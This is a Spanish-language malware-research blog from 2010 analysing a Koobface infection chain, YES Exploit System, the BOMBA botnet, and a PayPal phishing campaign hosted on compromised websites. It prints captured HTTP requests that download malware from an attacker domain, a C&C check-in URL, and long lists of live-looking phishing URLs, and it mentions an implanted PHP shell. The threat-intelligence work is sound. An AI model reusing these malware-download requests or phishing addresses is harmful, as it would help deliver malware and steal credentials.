MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

25.7.10

Circuito de Koobface desde 91.188.59.10 (BKCNET "SIA" IZZI)

Luego de varios meses sin tener novedades de Koobface, por lo menos sobre su propagación típica empleando como cobertura de ataque la clásica pantalla falsa de YouTube, vuelve con otra campaña de propagación.

En esta oportunidad, su diseminación sigue siendo a través de ingeniería social visual pero no bajo el template del supuesto video de YouTube sino que utiliza una página con contenido pornográfico.


Como se aprecia en la captura, cuando se intenta acceder a alguno de los supuestos videos, una pequeña ventana advierte sobre la necesidad de la descarga de un codec. Al aceptar, se descarga Koobface bajo la cobertura de un binario llamado codec.exe (5910e59d592781cec3234abf57f8d000), desde la dirección IP 91.188.59.10 que resuelve el dominio 1zabslwvn538n4i5tcjl.com. Esta IP es utilizada para la propagación de Koobface desde marzo de 2010.

Además, la página contiene embebido un script que redirecciona el tráfico hacia la descarga de un archivo PDF que contiene un exploit para CVE-2008-2992.


También en la misma IP pero que deja en evidencia que su gestión se esta realizando a través de un conocido crimeware: YES Exploit System.


El binario ejecutable codec.exe se encuentra empaquetado con UPX (UPX 0.89.6 - 1.02 / 1.05 - 1.22 -> Markus & Lazlo). Cuando se activa genera un BAT (se autoelimina) con instrucciones al C&C, estableciendo conexión contra 1zabslwvn538n4i5tcjl.com desde donde descarga los siguientes códigos maliciosos:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

El BAT contiene la siguiente instrucción de conexión y envió de información al C&C:

http://urodinam.net/33t.php?stime=1280078675

Este dominio se encuentra en la misma dirección IP 91.188.59.10 con instrucciones para la descarga de otro malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

Se trata de una copia del rogue Security essentials 2010. Se conecta a getexepizdec.com (91.188.59.211) desde donde descarga el archivo firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) y getmsdfgee54.com (88.80.4.19) desde donde descarga exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) con una muy baja tasa detección.

Resumiendo, el circuito que recorre koobface desde BKCNET "SIA" IZZI involucra diferentes piezas del ámbito delictivo que se encuentran interrelacionadas entre si con el mismo objetivo: $$$$$ (retroalimentar la economía clandestina); dejando a su paso un verdadero portfolio de malware.

Bajo 91.188.59.10 es gestionado por un conocido crimeware cuyo costo en el mercado underground ronda los $1000 y al ser ejecutado se encarga de apuntar la descarga de otros códigos maliciosos a la computadora victima, gestionados bajo la coordinación de afiliados de negocio que incrementan sus ganancias por cada instalación exitosa del rogue.

Información relacionada
Simbiosis del malware actual. Koobface
Campaña de propagación de Koobface a través de Blogspot
YES Exploit System como Crimeware-as-a-Service
YES Exploit System. Otro crimeware made in Rusia

Ver más

17.7.10

Defacement by "Exploit Pack's"

Los ataques de defacing, generalmente atribuidos a las actividades de hacktivismo y muchas veces a los llamados "script Kiddies" (aunque creo que en la actualidad lo que mejor describe a esta clase de "chicos malos" es: aspirantes a delincuentes), pasaron al plano delictivo como una especie de capricho o reproche en contra de algunos exploit's pack que presentan ciertas vulnerabilidades y ya se comenzó a ver algunos ejemplos. Sin embargo, esto no corta las actividades delictivas de ese botmaster.

La imagen que a continuación se presenta se trata de un "Blind Defacements" contra Eleonore Exploit Pack, lo que significa que solo podrá ser visualizado por el botmaster luego de sortear el proceso de autenticación:

En el siguiente caso (encontrado por Francisco Ruiz del equipo de MalwareIntelligence), el defacing fue realizado contra un SpyEye.

Otros crimeware que podrían ser propensos a esto son:
Entre la comunidad de investigadores, podría decirse que buscar vulnerabilidades en el crimeware es una actividad común y hasta como un hobby si me permiten decirlo, cuyo objetivo bajo ningún punto de vista es realizar un defacing. Por lo que sin lugar a dudas, la competencia entre "fanáticos" de determinados crimeware, "patriotas" que buscan fastidiar las actividades delictivas en función del país de origen y otros ladrones informáticos que roban los "clientes" de otros ladrones informáticos, se está convirtiendo en actividades extras dentro del ecosistema delictivo.

Información relacionada
YES Exploit System como Crimeware-as-a-Service
Estado del arte en Eleonore Exploit Pack II
SpyEye Bot. Análisis de una nueva alternativa del escenario crimeware
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
Mirando de cerca la estructura de Unique Sploits Pack
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades

Ver más

11.7.10

YES Exploit System como Crimeware-as-a-Service

En los últimos años el fenómeno Cloud Computing se ha transformado en un verdadero punto de inflexión en lo que a seguridad de la información se refiere, cuyo principal foco de controversia no pasa tanto por los mecanismos de protección que se puedan llegar a implementar sobre sus arquitecturas, sino que ronda más sobre la falta de confianza que todavía existe en quienes deben tomar las decisiones necesarias para implementar servicios de este estilo.

Sin embargo, y sin lugar a dudas, para los delincuentes la seguridad en Cloud Computing no constituye un problema ni un limitante para seguir alimentando la economía clandestina y, en cierta forma, adaptar esta tecnología para ofrecer alternativas "diferenciadoras" dentro del competitivo escenario que plantea el negocio del crimeware.

YES Exploit System, uno de los tantos sistemas que permiten automatizar la explotación de vulnerabilidades para reclutar zombis, plantea precisamente esto.

Empleando un esquema que desde el punto de vista gráfico no tiene nada que envidiar a cualquiera de los sistemas operativos que se soportan y utilizan a través de "la nube", se limita simplemente a ofrecer las opciones necesarias para las actividades de interés de loa delincuentes. Lo cual deja en evidencia que los desarrolladores de este tipo de aplicaciones conocen perfectamente las necesidades delictivas de sus "clientes".

Incluso, implementando mecanismos de contrainteligencia cuyos objetivos se centran en, por un lado, verificar la reputación del dominio (Domain checker) empleado para las maniobras delictivas chequeándolo automáticamente contra los principales servicios que se encargan de agregar en una base de datos las URL’s fraudulentas; entre ellos ZeuS Tracker, los amigos de MDL (MalwareDomainList), SiteAdvisor, Norton List, etc., además de poder agregar de forma manual cualquier otro que no se incluya por defecto manipulando el code de determinado archivos.

Por el otro, comprobar la integridad del malware propagado (AV Checker). Ambos "recursos delictivos" nacidos como consecuencia del alto crecimiento y oferta de este tipo de crimeware.

Una de las últimas campañas dirigidas a través de la última versión de YES Exploit System fue la diseminación de la familia de ransomware que se observa en la siguiente imagen:

Cronológicamente hablando, este crimeware posee tres generaciones y el modelo de negocio dejó de ser tan solo una cuestión operada desde la clandestinidad de ciertos foros underground para, además de ello, realizar la venta a través de asociados, vía web y empleando como principal canal de comunicación: ICQ. 


YES Exploit System se asemeja mucho a un esquema de negocio convencional pero exclusivamente diseñado con propósitos delictivos. Incluso, si consideramos que entre los tantos recursos generados para soportar el crimeware ya se encuentra el (DBaaS) DataBase-as-a-Service, no debería sorprendernos encontrar, entre los procesos de investigación, el soporte de la "base de clientes" de YES-ES (o cualquier otro), también desde "la nube" y hosteado por un "tercero".

Información relacionada
Crimeware-as-a-Service y mecanismos de evasión antivirus
YES Exploit System. Official Business Partner’s
YES Exploit System. Manipulando la seguridad del atacante
YES Exploit System. Otro crimeware made in Rusia

Ver más

4.7.10

Campaña de phishing a PayPal by "Hacker Newbie Community"

Los ataques de phishing son cada vez más frecuentes y ya no se limitan como en sus comienzos a utilizar como cobertura solo entidades bancarias, y cualquier servicio que se ofrezca a través de Internet y que requiera nombre de usuario y contraseña, tarde o temprano será motivo blanco para los delincuentes.

PayPal no es un servicio nuevo y fue uno de los primeros en ofrecer servicios e-commerce, cuya imagen es una de las más empleadas para realizar phishing. A partir de hoy 4 de Julio (día de la Independencia de Estados Unidos) se ha activa una masiva campaña de phishing contra PayPal.

Algunas de las direcciones empleadas son:

211.233.89.211/~kesalos7/bbs/data/fr/error_login.html
383-1330.com/~kesalos7/bbs/data/fr/error_login.html
93awing.com/~kesalos7/bbs/data/fr/error_login.html
actflash.com/~kesalos7/bbs/data/fr/error_login.html
amitabulpgm.com/~kesalos7/bbs/data/fr/error_login.html
amusespace.com/~kesalos7/bbs/data/fr/error_login.html
apeopleday.com/~kesalos7/bbs/data/fr/error_login.html
balloonnet.org/~kesalos7/bbs/data/fr/error_login.html
bizmarkorea.com/~kesalos7/bbs/data/fr/error_login.html
booknanum.org/~kesalos7/bbs/data/fr/error_login.html
bracetech.co.kr/~kesalos7/bbs/data/fr/error_login.html
camwiz.com/~kesalos7/bbs/data/fr/error_login.html
cellclinic.net/~kesalos7/bbs/data/fr/error_login.html
creinno.net/~kesalos7/bbs/data/fr/error_login.html
daeguubf.org/~kesalos7/bbs/data/fr/error_login.html
dicworld.com/~kesalos7/bbs/data/fr/error_login.html
dongilled.net/~kesalos7/bbs/data/fr/error_login.html
dreamfancy.com/~kesalos7/bbs/data/fr/error_login.html
edusun.or.kr/~kesalos7/bbs/data/fr/error_login.html
ejacademy.net/~kesalos7/bbs/data/fr/error_login.html
eng.teletron.co.kr/~kesalos7/bbs/data/fr/error_login.html
eng.uju.com/~kesalos7/bbs/data/fr/error_login.html
epsdent.com/~kesalos7/bbs/data/fr/error_login.html
eqmath.com/~kesalos7/bbs/data/fr/error_login.html
e-somci.com/~kesalos7/bbs/data/fr/error_login.html
espacenkw.com/~kesalos7/bbs/data/fr/error_login.html
eunhyoung.com/~kesalos7/bbs/data/fr/error_login.html
faview.com/~kesalos7/bbs/data/fr/error_login.html
filetook.com/~kesalos7/bbs/data/fr/error_login.html
foodok.net/~kesalos7/bbs/data/fr/error_login.html
gtipm.com/~kesalos7/bbs/data/fr/error_login.html
hamonkorea.com/~kesalos7/bbs/data/fr/error_login.html
hapoom.net/~kesalos7/bbs/data/fr/error_login.html
hunkihong.com/~kesalos7/bbs/data/fr/error_login.html
ibang.net/~kesalos7/bbs/data/fr/error_login.html
iconpos.com/~kesalos7/bbs/data/fr/error_login.html
i-ekc.com/~kesalos7/bbs/data/fr/error_login.html
ifnotall.com/~kesalos7/bbs/data/fr/error_login.html
ihavetwoson.com/~kesalos7/bbs/data/fr/error_login.html
imflavor.com/~kesalos7/bbs/data/fr/error_login.html
inskyc.net/~kesalos7/bbs/data/fr/error_login.html
jangmiwon.com/~kesalos7/bbs/data/fr/error_login.html
jinsungtech.net/~kesalos7/bbs/data/fr/error_login.html
jiwontech.com/~kesalos7/bbs/data/fr/error_login.html
jobusa.kr/~kesalos7/bbs/data/fr/error_login.html
kafe.or.kr/~kesalos7/bbs/data/fr/error_login.html
kesalos7.com/~kesalos7/bbs/data/fr/error_login.html
koreachurch.or.kr/~kesalos7/bbs/data/fr/error_login.html
krgs.org/~kesalos7/bbs/data/fr/error_login.html
linux-one.host114.com/~kesalos7/bbs/data/fr/error_login.html
risingfun.net/~kesalos7/bbs/data/fr/error_login.html
threeecologies.com/~kesalos7/bbs/data/fr/error_login.html
ufoet.com/~kesalos7/bbs/data/fr/error_login.html
ujukfc.jp/~kesalos7/bbs/data/fr/error_login.html
unistorybook.com/~kesalos7/bbs/data/fr/error_login.html
wakojeonnam.org/~kesalos7/bbs/data/fr/error_login.html

Detrás de estos ataques se encuentra un grupo de delincuentes que bajo el nombre de "Hacker Newbie Community" se encuentra frente a la campaña de phishing.

El defacing que se observa en la imagen se encuentra como un sello de los ejecutores en cada uno de los sitios comprometidos donde se aloja la falsa página de PayPal conjuntamente con el paquete de archivos fraudulentos.
Actualización 04.07.2010
Nuevos dominios activos. A diferencia de la primera "camada" de sitios vulnerados, en este caso el paquete phishing se encuentra alojado en la carpeta /~radiocon/ y en todo ellos se implantó un backdoor (PHP Shell) a través del archivo uk.php.

4dalove.org/~radiocon/security-cod/webscr.php
4less.tv/~radiocon/security-cod/webscr.php
64.6.241.8/~radiocon/security-cod/webscr.php
64.6.242.186/~radiocon/security-cod/webscr.php
64.6.242.50/~radiocon/security-cod/webscr.php
64.6.242.60/~radiocon/security-cod/webscr.php
64.6.242.78/~radiocon/security-cod/webscr.php
64.6.243.76/~radiocon/security-cod/webscr.php
888sandngravel.com/~radiocon/security-cod/webscr.php
aa.org/~radiocon/security-cod/webscr.php
aama.com.ar/~radiocon/security-cod/webscr.php
aikiti.ch/~radiocon/security-cod/webscr.php
alasparalamente.com.ar/~radiocon/security-cod/webscr.php
anthonybabyska.com/~radiocon/security-cod/webscr.php
arthaus.us/~radiocon/security-cod/webscr.php
b2bwebcreations.com/~radiocon/security-cod/webscr.php
badboybulls.com/~radiocon/security-cod/webscr.php
behlafamily.com/~radiocon/security-cod/webscr.php
benny.co.za/~radiocon/security-cod/webscr.php
bigmindrecords.com/~radiocon/security-cod/webscr.php
blakelybears.org/~radiocon/security-cod/webscr.php
box2.host1free.com/~barbad/emikrazie/update.php
breathoflifetribe.com/~radiocon/security-cod/webscr.php
buckinbull.com/~radiocon/security-cod/webscr.php
buschdesign.com/~radiocon/security-cod/webscr.php
buy4less.ch/~radiocon/security-cod/webscr.php
cabvideoproductions.com/~radiocon/security-cod/webscr.php
caercdelu.org.ar/~radiocon/security-cod/webscr.php
cairncomm.com/~radiocon/security-cod/webscr.php
calculusproductions.com/~radiocon/security-cod/webscr.php
call-complete.com/~radiocon/security-cod/webscr.php
caminosdelser.com.ar/~radiocon/security-cod/webscr.php
canyonconveying.com/~radiocon/security-cod/webscr.php
casagueroonline.com/~radiocon/security-cod/webscr.php
casatrend.com/~radiocon/security-cod/webscr.php
ccflecuador.com/~radiocon/security-cod/webscr.php
centurysecuritypa.com/~radiocon/security-cod/webscr.php
championship.ch/~radiocon/security-cod/webscr.php
championshipsports.com/~radiocon/security-cod/webscr.php
chhetrylaw.com/~radiocon/security-cod/webscr.php
citizenworld.co.za/~radiocon/security-cod/webscr.php
clubalouette.ca/~radiocon/security-cod/webscr.php
complejo-corralito.com.ar/~radiocon/security-cod/webscr.php
complejolasmoras.com.ar/~radiocon/security-cod/webscr.php
congresodeturismodeentrerios.com/~radiocon/security-cod/webscr.php
corporatecolors.net/~radiocon/security-cod/webscr.php
costantinorocca-golfacademy.com/~radiocon/security-cod/webscr.php
cybertrek.co.za/~radiocon/security-cod/webscr.php
cybertrek.org/~radiocon/security-cod/webscr.php
danielcarbone.com.ar/~radiocon/security-cod/webscr.php
danielhoc.com.ar/~radiocon/security-cod/webscr.php
didjrhythm.com/~radiocon/security-cod/webscr.php
digimael.com/~radiocon/security-cod/webscr.php
donaldgrogers.com/~radiocon/security-cod/webscr.php
dougbusch.com/~radiocon/security-cod/webscr.php
ecuadoralaventa.com/~radiocon/security-cod/webscr.php
elegantmoments.com/~radiocon/security-cod/webscr.php
elpatoviganoni.com.ar/~radiocon/security-cod/webscr.php
emilioflores.com/~radiocon/security-cod/webscr.php

ericlawtonlaw.com/~radiocon/security-cod/webscr.php
ericlawtonphotography.com/~radiocon/security-cod/webscr.php
escueladeparteras.com.ar/~radiocon/security-cod/webscr.php
estimulosadecuados.com.ar/~radiocon/security-cod/webscr.php
everydaygandhis.org/~radiocon/security-cod/webscr.php
exclusiveflowersecuador.com/~radiocon/security-cod/webscr.php
faltlaw.com/~radiocon/security-cod/webscr.php
familyaffair.us/~radiocon/security-cod/webscr.php
fire-xpert.com/~radiocon/security-cod/webscr.php
fotoclub-capriasca.ch/~radiocon/security-cod/webscr.php
fullmoonrisingmusic.com/~radiocon/security-cod/webscr.php
gharekabab.com/~radiocon/security-cod/webscr.php
grupoprovedatos.com/~radiocon/security-cod/webscr.php
hamsterworks.com/~radiocon/security-cod/webscr.php
hartbuilt.com/~radiocon/security-cod/webscr.php
housedatabank.com/~radiocon/security-cod/webscr.php
http://danziskie.com/~radiocon/security-cod/webscr.php
hydro-marine.com/~radiocon/security-cod/webscr.php
hydro-marine.net/~radiocon/security-cod/webscr.php
imageavpro.com/~radiocon/security-cod/webscr.php
immigrationattorney.org/~radiocon/security-cod/webscr.php
ismit.com/~radiocon/security-cod/webscr.php
jalanjalanimports.com/~radiocon/security-cod/webscr.php
jeffandlynette.com/~radiocon/security-cod/webscr.php
jessebarish.com/~radiocon/security-cod/webscr.php
jimmiewalden.com/~radiocon/security-cod/webscr.php
jletecnologiasweb.com/~radiocon/security-cod/webscr.php
jojoalves.com/~radiocon/security-cod/webscr.php
kaminimusic.com/~radiocon/security-cod/webscr.php
khasskhass.com/~radiocon/security-cod/webscr.php
kinggraphics.com/~radiocon/security-cod/webscr.php
lactancia.com.ar/~radiocon/security-cod/webscr.php
latinrootstravel.com/~radiocon/security-cod/webscr.php
lexafina.com/~radiocon/security-cod/webscr.php
liberaldemocracynepal.org/~radiocon/security-cod/webscr.php
libra-indumentaria.com.ar/~radiocon/security-cod/webscr.php
liveforspeed.ch/~radiocon/security-cod/webscr.php
loveastruth.com/~radiocon/security-cod/webscr.php
mailrise.net/~radiocon/security-cod/webscr.php
malcantone.com/~radiocon/security-cod/webscr.php
malibusound.com/~radiocon/security-cod/webscr.php
merrychristmas.ch/~radiocon/security-cod/webscr.php
michaelmolluramusic.com/~radiocon/security-cod/webscr.php
movisocialmisiones.com.ar/~radiocon/security-cod/webscr.php
mpscomex.com.ar/~radiocon/security-cod/webscr.php
mujersabia.com.ar/~radiocon/security-cod/webscr.php
multinacionaltransportadora.com/~radiocon/security-cod/webscr.php
municaseros.gov.ar/~radiocon/security-cod/webscr.php
myaccount.elegantmoments.com/~radiocon/security-cod/webscr.php
nepalcouncil.org/~radiocon/security-cod/webscr.php
nepalembassyusa.org/~radiocon/security-cod/webscr.php
nepaliman.com/~radiocon/security-cod/webscr.php
nepalstudycenter.org/~radiocon/security-cod/webscr.php
nepaltvusa.com/~radiocon/security-cod/webscr.php
network.b2bwebcreations.com/~radiocon/security-cod/webscr.php
novaggio.com/~radiocon/security-cod/webscr.php
nrn.nepalcouncil.org/~radiocon/security-cod/webscr.php
nufaro.com/~radiocon/security-cod/webscr.php
oddandrandom.com/~radiocon/security-cod/webscr.php
okolexproperties.com/~radiocon/security-cod/webscr.php
onelovebeauty.net/~radiocon/security-cod/webscr.php
padreswaldorf.com.ar/~radiocon/security-cod/webscr.php
passiveincomesecrets.com/~radiocon/security-cod/webscr.php
pearlregmifineart.com/~radiocon/security-cod/webscr.php
pelusolandi.com/~radiocon/security-cod/webscr.php
peppesbest.com/~radiocon/security-cod/webscr.php
perraultcorp.com/~radiocon/security-cod/webscr.php
phoolbari.com/~radiocon/security-cod/webscr.php
photo.com/~radiocon/security-cod/webscr.php
pogplace.com/~radiocon/security-cod/webscr.php
premraja.com/~radiocon/security-cod/webscr.php
prewiringlaredo.com/~radiocon/security-cod/webscr.php
produccionesdelsol.com/~radiocon/security-cod/webscr.php
publicidadmontanana.com.ar/~radiocon/security-cod/webscr.php
publinetwork.ch/~radiocon/security-cod/webscr.php
puertopiapsa.com/~radiocon/security-cod/webscr.php
qmbsales.com.au/~radiocon/security-cod/webscr.php
radio9fm.com.ar radio9fm.com.ar/~radiocon/security-cod/webscr.php
radiodovaan.com/~radiocon/security-cod/webscr.php
rajeshshakya.com/~radiocon/security-cod/webscr.php
ranchometals.com/~radiocon/security-cod/webscr.php
redgfu.org.ar/~radiocon/security-cod/webscr.php
ristoranteilcastagneto.com/~radiocon/security-cod/webscr.php
robinbvance.com/~radiocon/security-cod/webscr.php
ronyentertainment.com/~radiocon/security-cod/webscr.php
russiancultureinnepal.org/~radiocon/security-cod/webscr.php
sagarmathatv.us/~radiocon/security-cod/webscr.php
saharapc.com/~radiocon/security-cod/webscr.php
selfdefencesecrets.com/~radiocon/security-cod/webscr.php
sharmilauprety.com/~radiocon/security-cod/webscr.php
shilohouse.org/~radiocon/security-cod/webscr.php
shopmynepa.com/~radiocon/security-cod/webscr.php
showbizconsultants.com/~radiocon/security-cod/webscr.php
silverwingsmultimedia.com/~radiocon/security-cod/webscr.php
simracing.ch/~radiocon/security-cod/webscr.php
siyavuya.com/~radiocon/security-cod/webscr.php
skoz.net/~radiocon/security-cod/webscr.php
slpkorea.com/~radiocon/security-cod/webscr.php
soniacavia.com.ar/~radiocon/security-cod/webscr.php
sonicfarm.com/~radiocon/security-cod/webscr.php
starsonstageinc.com/~radiocon/security-cod/webscr.php
sunboonitiri.com/~radiocon/security-cod/webscr.php
superlarge.com/~radiocon/security-cod/webscr.php
tabmanagement.com/~radiocon/security-cod/webscr.php
teatroelatajo.com.ar/~radiocon/security-cod/webscr.php
thebridgenetwork.org/~radiocon/security-cod/webscr.php
thehimalayanhouse.com/~radiocon/security-cod/webscr.php
thevillageii.com/~radiocon/security-cod/webscr.php
tierrasdelacienaga.com.ar/~radiocon/security-cod/webscr.php
timelessimagesofisrael.com/~radiocon/security-cod/webscr.php
tonicomsa.com/~radiocon/security-cod/webscr.php
topangacollective.com/~radiocon/security-cod/webscr.php
tplenterprises.com/~radiocon/security-cod/webscr.php
trancasturtlerescue.com/~radiocon/security-cod/webscr.php
truewordofgodchurch.org/~radiocon/security-cod/webscr.php
turnkeywebmasters.net/~radiocon/security-cod/webscr.php
ucruruguay.com.ar/~radiocon/security-cod/webscr.php
unseenpictures.com/~radiocon/security-cod/webscr.php
uomo.ch/~radiocon/security-cod/webscr.php
usatoyou.com/~radiocon/security-cod/webscr.php
varietytrucksales.com/~radiocon/security-cod/webscr.php
vergogna.ch/~radiocon/security-cod/webscr.php
virtualcar.ch/~radiocon/security-cod/webscr.php
waterfordav.com/~radiocon/security-cod/webscr.php
webfixnow.com/~radiocon/security-cod/webscr.php
wigbeauty.co.za/~radiocon/security-cod/webscr.php
wigbeauty.com/~radiocon/security-cod/webscr.php
winonline.co.za/~radiocon/security-cod/webscr.php
wowwomenontopoftheworld.com/~radiocon/security-cod/webscr.php
wvpatransport.com/~radiocon/security-cod/webscr.php
xkeep.net/~radiocon/security-cod/webscr.php

Información relacionada
Página web del film Besouro vulnerada con ataques de phishing a PayPal
Campaña de phishing contra Claro Argentina
Phishing database VI
Web de Hooters Alemania comprometida con phishing a HSBC
Nueva campaña de phishing contra Facebook encabezada por ZeuS
Campaña de phishing orientada a jugadores de Zynga
Disección de un kit fraudulento. Wachovia phishing attack

Ver más

3.7.10

BOMBA Botnet. Nueva alternativa delictiva alimentando la economía del crimeware

En una reciente investigación, Francisco Ruiz, Crimeware Researcher de MalwareIntelligence logró romper las barreras de seguridad de un nuevo crimeware diseñado para reclutar zombis y automatizar la ejecución masiva y a gran escala de delitos informáticos que se llevan a cabo empleando como vector de ataque los equipos comprometidos que forman parte de la botnet.

Se trata de BOMBA, a la cual se accede vía web y cuyo sistema de autenticación se basa tan solo en el requerimiento de una contraseña, un sistema de acceso adoptado por muchas aplicaciones de este estilo entre las que se destacan Phoenix Exploit's Kit y n0ise Bot.


El servidor donde se aloja este crimeware posee base en Letonia (aunque el registro administrativo se encuentra en Moscú, Rusia) bajo el AS6851 (autonomous system) que es conocido como la red BKCNET "SIA" IZZI.

Este ASN está catalogado como servidor de actividades delictivas como la propagación de rogue, alojamiento de otros kits como YES Exploit System, durante el 2009 alojo las estrategias de la botnet Waledac (sucesora de Storm), también a ZeuS y hasta posee relación directa con los delincuentes que se encuentran detrás de las maniobras de la botnet Koobface.


El paquete se encuentra orientado a explotar vulnerabilidades a través de la familia de sistemas operativos de Microsoft, como vemos en la siguiente imagen, Windows XP, Windows Vista Y Windows Seven; a través de los exploits precompilados para explotar vulnerabilidades en JAVA (Java Deployment Toolkit), Internet Explorer, Adobe Reader y el ya clásico MDAC.

Si bien no plantea una alternativa compleja en cuanto a estructura, no deja de ser una grave amenaza que se suma a la demanda delictiva y se inserta en el circuito de acciones ilícitas.

Información relacionada

Ver más